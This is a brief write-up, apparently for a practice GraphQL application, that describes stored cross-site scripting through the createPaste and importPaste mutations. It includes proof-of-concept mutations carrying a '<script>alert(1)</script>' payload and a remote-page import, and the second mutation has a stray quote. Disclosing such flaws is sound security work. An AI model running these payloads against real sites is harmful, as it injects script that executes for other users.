The GraphQL mutations createPaste and importPaste allow creating and importing new pastes. The pastes may include any character without any restrictions. The pastes would then render in
the Public and Private paste pages, which would result in a Cross Site Scripting vulnerability (XSS).
# Create New Paste allows special characters that would render in HTML.
mutation {
createPaste(title:"<script>alert(1)</script>", content:"zzzz", public:true) {
pasteId
}
}
# Alternatively, importing a paste that includes Javascript will also result in the same behaviour.
mutation {
importPaste(host:"localhost", port:80, path:"/xss.html"")
}